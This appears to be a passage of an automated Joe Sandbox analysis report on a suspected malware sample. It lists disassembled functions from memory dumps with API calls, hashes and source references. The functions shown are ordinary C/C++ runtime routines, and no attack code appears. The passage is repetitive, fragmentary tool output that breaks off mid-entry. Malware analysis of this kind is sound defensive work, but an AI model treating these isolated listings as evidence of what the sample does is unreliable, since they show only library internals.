                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0022B8D9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3716348337-0
                                                                                                                                                                                                                                              • Opcode ID: 9a5a12544ee1248371d6425e778b3c0a02bc814f2bc9becc665d2ecb0fa5424c
                                                                                                                                                                                                                                              • Instruction ID: 2de25f5d20141fe9068a9a9c7fcb0189ead4195dc74ccc324692710c3dbd0aa2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a5a12544ee1248371d6425e778b3c0a02bc814f2bc9becc665d2ecb0fa5424c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D601E131C2412AABCB06EFE4B8556BD7769AF44310F144809F40067291CF709E208F92
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00229ED5
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00229EE0
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00229F4E
                                                                                                                                                                                                                                                • Part of subcall function 00229DA2: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00229DBA
                                                                                                                                                                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 00229EFB
                                                                                                                                                                                                                                              • _Yarn.LIBCPMT ref: 00229F11
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1088826258-0
                                                                                                                                                                                                                                              • Opcode ID: 030009353e09b4a5398f347f646ff3671e75d97e8c9312a7752bf6188406d4e0
                                                                                                                                                                                                                                              • Instruction ID: cc8de1720c24839e8cc75d1491c86d65bd22d12fed68d572badc15032244bd34
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 030009353e09b4a5398f347f646ff3671e75d97e8c9312a7752bf6188406d4e0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1501BC35A25220ABC70AEFA0F95967C7BA1FF85351F144049E80197381CF34AEA2DF99
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strcspn
                                                                                                                                                                                                                                              • String ID: .$invalid string position
                                                                                                                                                                                                                                              • API String ID: 3709121408-2424062830
                                                                                                                                                                                                                                              • Opcode ID: c8095b165174ff14788751790909a1844f8f80e025134c09ad35761f1fd878ec
                                                                                                                                                                                                                                              • Instruction ID: d44f87b800ce0713383f16b957826ed319ed2be7d7bb7bd2bc5cafbc9173d1c0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8095b165174ff14788751790909a1844f8f80e025134c09ad35761f1fd878ec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6502E571628325AFC714DFA4D484A2AB7E5FFC5304F14865CF8958B361EB70E964CB82
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                              • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                              • Opcode ID: b96cb27a47064ec4f46e26920a6f6b9797f4dc994e0044360008d87843b1187e
                                                                                                                                                                                                                                              • Instruction ID: 7d24334a414cc8a245c886c22d8f254b25d952c36ca94aed5f9a23479a02db1e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b96cb27a47064ec4f46e26920a6f6b9797f4dc994e0044360008d87843b1187e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28C1AE35220212EFC714DF28D490B6AB7E1FF88314F95866CE8598B3A1D736EC65CB81
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: GetLastError.KERNEL32(?,?,00233FBA,00254C30,0000000C), ref: 0023AB27
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: SetLastError.KERNEL32(00000000), ref: 0023ABC9
                                                                                                                                                                                                                                              • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,002346FA,?,?,?,00000055,?,-00000050,?,?,?), ref: 0023F395
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,002346FA,?,?,?,00000055,?,-00000050,?,?), ref: 0023F3CC
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                              • String ID: l#%$utf8
                                                                                                                                                                                                                                              • API String ID: 943130320-1806676032
                                                                                                                                                                                                                                              • Opcode ID: bd9268b2b87178d66018bc7bbed04c690765e6cd93724827d46a30db42824213
                                                                                                                                                                                                                                              • Instruction ID: 3e5512d1bb866e2e110405c5fb2cb89ed46810312e4e7367fb02af14371e86c7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd9268b2b87178d66018bc7bbed04c690765e6cd93724827d46a30db42824213
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C51E9F1E20306BAD765AF70EE42BB773A8EF04700F14447AFB4997181E770D9608AA1
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002455BD,00000000,?,00258370,?,?,?,002454F4,00000004,InitializeCriticalSectionEx,0024E634,0024E63C), ref: 0024552E
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,002455BD,00000000,?,00258370,?,?,?,002454F4,00000004,InitializeCriticalSectionEx,0024E634,0024E63C,00000000,?,0023A57C), ref: 00245538
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00245560
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                              • Opcode ID: 23f128627182a6bc39588da36d4edd1a388f49472ef4c2200735cf3286da24b0
                                                                                                                                                                                                                                              • Instruction ID: 1ceacc808259dd4d2f6bb0088e777e31f7303aeba4d5e8a1e573c2bd7968123a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23f128627182a6bc39588da36d4edd1a388f49472ef4c2200735cf3286da24b0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CE04830694305B7DF155F50FC0AB683BA59B10F92F641020F94CE44E1D7719A709648
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(439473B7,00000000,00000000,?), ref: 0024292D
                                                                                                                                                                                                                                                • Part of subcall function 0023A9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0023C231,?,00000000,-00000008), ref: 0023AA42
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00242B7F
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00242BC5
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00242C68
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2112829910-0
                                                                                                                                                                                                                                              • Opcode ID: df65fdab76a0d00940e409b591fcb2fd99442dc2078e9d08cc732ee548472920
                                                                                                                                                                                                                                              • Instruction ID: 49712424502d63908cc3902fb40641404d7835b8d381ccd9bee0c7862dd6657f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df65fdab76a0d00940e409b591fcb2fd99442dc2078e9d08cc732ee548472920
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61D198B1D10249DFCB19CFE9D880AADBBB4FF08304F68412AE816EB351E630A955CF50
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                                                                                                              • Opcode ID: 398726c1ddf90cc29dc85cf314bcaa93128726c4756b7088aa0258095061fbcf
                                                                                                                                                                                                                                              • Instruction ID: 347c6e459829ee099877541254117ab7123b20a58c54f193d01ac3dad9488df8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 398726c1ddf90cc29dc85cf314bcaa93128726c4756b7088aa0258095061fbcf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6451E7B252460BAFDB25AF50D442B7AB7A4FF46710F14452EEC0647291D7B1ECE0CB90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022286C
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022288A
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 002228AC
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0022291A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 593203224-0
                                                                                                                                                                                                                                              • Opcode ID: 7386cb9e212a22ba7b8f9e2c411cd1bf0724b973bb8653294436a48e53f7b17a
                                                                                                                                                                                                                                              • Instruction ID: 692ef6bc6888484b2a27d8791d5de267ee6e3b8ebff977f5e2b0d6c0c727a515
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7386cb9e212a22ba7b8f9e2c411cd1bf0724b973bb8653294436a48e53f7b17a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01219C71924320FFC720EFA5F84DA2A77A0FB58325F05445DE8884B261D732AD64CF92
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 002282AC
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 002282CA
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 002282EC
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0022835A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 593203224-0
                                                                                                                                                                                                                                              • Opcode ID: c0b8688b9ed7462a6944f3493dfec6734c418789efa1c16b9c94632d6b2a20a2
                                                                                                                                                                                                                                              • Instruction ID: 3d510944d051fdee2b88142d5b53fdbae4ab9986574ea5ed45111a92e0734ce1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0b8688b9ed7462a6944f3493dfec6734c418789efa1c16b9c94632d6b2a20a2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C821BF71915321AFC710EF98F849A2A73E0FF58725F45459DE8884B262EB30EC60CF86
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00226B0C
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00226B2A
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00226B4C
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00226BBA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 593203224-0
                                                                                                                                                                                                                                              • Opcode ID: b19c6e81a8bef0f06162a2239b754182567247e152a25b6698a900bfdae1d447
                                                                                                                                                                                                                                              • Instruction ID: f776ba968ffd4f7dee796b30c3156baed4b09a7b9f290fed5f79643745d59104
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b19c6e81a8bef0f06162a2239b754182567247e152a25b6698a900bfdae1d447
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E21A672914325AFC710EF94F84DA2AB7E0EF58729F05445DE8849B351D730AC60CF82
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022839C
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 002283BA
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 002283DC
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0022844A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 593203224-0
                                                                                                                                                                                                                                              • Opcode ID: 7bf6f20349d472faf06d36e017e8d280e30197537660ae74b6d6aa6b09bcc0ba
                                                                                                                                                                                                                                              • Instruction ID: 24a12ad472b986088e45a2e57840117e2d7011a07de95976792c1d4dc4bf3b22
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bf6f20349d472faf06d36e017e8d280e30197537660ae74b6d6aa6b09bcc0ba
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA219471915325AFC710FF95F889A2AB3A0EF58725F05445DE8445B362DB30EC60CF82
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022547C
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022549A
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 002254BC
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0022552A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 593203224-0
                                                                                                                                                                                                                                              • Opcode ID: 483843484cca9f9752ec7b9297caed2a81f7a51c282571c77643a41ce0c9a538
